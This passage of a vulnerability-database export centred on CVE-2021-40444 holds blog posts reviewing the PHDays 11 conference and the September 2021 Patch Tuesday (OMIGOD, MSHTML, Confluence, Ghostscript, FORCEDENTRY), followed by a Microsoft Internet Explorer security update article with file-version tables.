PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36958", "CVE-2021-36968", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444"], "modified": "2021-09-15T13:19:48", "id": "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-06-11T01:56:16", "description": "Hello everyone! In this episode, I want to talk about the Positive Hack Days 11 conference, which took place on May 18 and 19 in Moscow. As usual, I want to express my personal opinion about this event.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239091>\n\nAs I did last year, I want to start talking about this conference with a few words about the sanctions. US sanctions against Positive Technologies, the organizers of Positive Hack Days, were introduced a year ago. At that time it seemed very serious and extraordinary. But today, when our country has become the most sanctioned country in the world, those sanctions against Positive Technologies seem very ordinary and unimportant. In fact, it even seems to benefit the company somehow.\n\n## Positive Technologies\n\nAt the end of last year, Positive Technologies became a public company with a strong focus on the domestic market and the market of friendly countries. The financial results are very impressive. The company's marketing is better than ever, especially everything related to video production. And, of course, their products are in even greater demand, because Western vendors have left the Russian market.\n\n## PHDays 11\n\nAs for the event, it is still the most important information security conference in Russia. In fact it was the most visited PHDays. 
10,000+ guests at the Moscow World Trade Center, 130,000+ viewers of online broadcasts. I was only on the second day, when it was not as crowded as the first day of the conference. The atmosphere at the event was not the same as at a regular conference. It was more like a nightclub. Subdued lights, music, a lot of screens and all sorts of lighting effects. Very unusual.\n\n## The Standoff\n\nThe main show of the conference is the CTF competition of hackers and blue teams, The Standoff. The toy city, which displays the infrastructure of the virtual state of F, has become really huge. Entire sectors of the economy were represented there: metallurgy, electric power industry, oil industry, transport, banking system, housing management, etc. All this is interconnected. An attack on one object can cause a butterfly effect that affects the entire state. Very impressive!\n\n## Talks\n\nThe PHDays 11 program included about 100 talks, which were attended by more than 250 speakers. One of them was me. It makes no sense to list all the talks, but logically I would highlight 3 of them.\n\n 1. Sergey Golovanov "[01111111day](<https://www.youtube.com/watch?v=p6-4Ky7uy_E>)" ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). He spoke about the attacks on Russian organisations after February 23rd. To summarize all that has been said, the number of attacks has become much greater. The source of the attacks is clear. Most of the attacks were simple and it was hacktivism, but they get more complicated with time. The main attacks are DDoS and penetration into the infrastructure for further data theft and destruction. Phishing is one of the commonly used penetration channels.\n 2. Alexander Goncharov "[CVE-2021-40444: why it is important](<https://www.youtube.com/watch?v=knCqmDoELjM>)" ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). Microsoft MSHTML Remote Code Execution Vulnerability. This is not the newest vulnerability, one of many. 
But in fact, it continues to be actively exploited, and mainly through phishing. Why? Since users are susceptible to phishing, hosts are not updated and hardened (disabling ActiveX, preventing office applications from creating child processes). And all this, of course, needs to be implemented in organizations. But one of the interesting questions is: can we now trust vendor updates that fix vulnerabilities? Alexander replied that we can, because enterprise IT vendors like Microsoft will not disable anything in terms of functionality. Simply because it will be a blow to their reputation.\n 3. And my presentation was just about this topic of trust. "[The new reality of information security and vulnerability management](<https://www.youtube.com/watch?v=phL8ClOLpqo>)" ([rus](<https://www.youtube.com/watch?v=XbAxuikX_eE>)). You can watch the video in my YouTube channel in Russian and with simultaneous translation. Simultaneous translation is difficult to do, especially in the fast track, so I will also make an extended English version of this report for [VMconf 22](<https://vmconf.pw/>). By the way, you can also submit a video about Vulnerability Management there if you want. So what was my report about. The new reality of information security (TNRoIS) began in February 2022. In this new reality, global vendors and open source software are less trusted than before. What was only recently viewed as a competitive product or service, has become a means of pressure, a Trojan horse, a threat to corporate information security. The new reality sets new requirements for key corporate processes, including the choice of IT products and information security solutions, security analysis, and update management. The forced de-Westernization of the IT infrastructure of Russian companies will not happen overnight. This is a long and difficult process. 
For example, is it true that by 2025 there will be no Microsoft software in Russian companies and everything will work on Russian Linux distributions? Now it seems too ambitious. Most likely we will see some kind of hybrid mode with a complex process of supporting unstable Western IT solutions and a simplified process for stable, mainly Russian IT solutions. Of course, it will be much more difficult than it was before, but there is a challenge in these difficulties. The problems faced by the Russian organizations in extreme form are relevant to much of the world, which means that certain terminology, approaches, and solutions can be successfully exported. \n\n## What could be better on PHDays 11?\n\nWell, there were few speeches about Vulnerability Management. For my taste. There was my presentation, there were a couple of speeches about specific vulnerabilities and rootkits, there was a [basic interview about Vulnerability Management](<https://www.youtube.com/watch?v=Scod5yQiKtM>) ([rus](<https://www.youtube.com/watch?v=Cgbq1qG_CZQ>)) and an interview about [MaxPatrol O2](<https://www.youtube.com/watch?v=hCSK0wi-KRU>) ([rus](<https://www.youtube.com/watch?v=SAt_gedhXw8>)). But it was very fragmented. It seems to me that the main conference of the leading Russian Vulnerability Management vendor should have a session or maybe even a track about Vulnerability Management. At least 2-3 hours. It would be nice to have a program that would resemble [Qualys QSC](<https://avleonov.com/2021/12/06/qsc21-vmdr-training-and-exam/>). After all, they talk about VM all day, why is it not possible on PHDays? Ideally, if there would be 80% about interesting practical cases and processes and 20% about how to solve them using Positive Technologies products (as a demonstration). That would be really cool and that would be right.\n\nIt may sound silly, but I missed bag chairs and sofas. There were far fewer of them. In past years, I liked to sit on them, relax and talk with colleagues. 
This time all the conversations were on the feet and it was not very convenient.\n\nIt seems like PHDays needs more space. There were practically no seats left in the halls. The fast track where I performed was in a tiny hall, which is not so easy to find. The organizers said that it did not happen on purpose. The schedule was changed at the last moment and the Fast Track had to be moved from a more convenient place. It's a bit sad, but the fact that full-length reports are a priority is right. And in our post-COVID time, the most important thing is video broadcasting, and it was at a very high level. My presentation went well, the audience was friendly, there were some very interesting questions.\n\nMany thanks to the organizers and participants. Until the next PHDays!", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T00:46:58", "type": "avleonov", "title": "PHDays 11: towards the Independence Era", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-11T00:46:58", "id": "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "href": 
"https://avleonov.com/2022/06/11/phdays-11-towards-the-independence-era/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This time, let's talk about recent vulnerabilities. I'll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. 
"This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network."\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that wasn't released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. "\u0410 critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks". "To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control". Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the "[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability". 
There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but [there are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T23:22:00", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-18T23:22:00", "id": 
"AVLEONOV:5945665DFA613F7707360C10CED8C916", "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-01-13T10:53:19", "description": "None\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The September 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. 
For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your update management and compliance toolsets.\n\nThis article applies to the following: \n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * The fixes that are included in this update are also included in the September 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from September 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the September 2021 Security Only Quality Update, and the September 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the July 13, 2021 SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. 
After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. 
\n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005563>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 
12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### Internet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:30| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 
12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 22:23| 417,280 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:42| 2,132,992 \nmshtml.dll.mui| 
11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 
11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 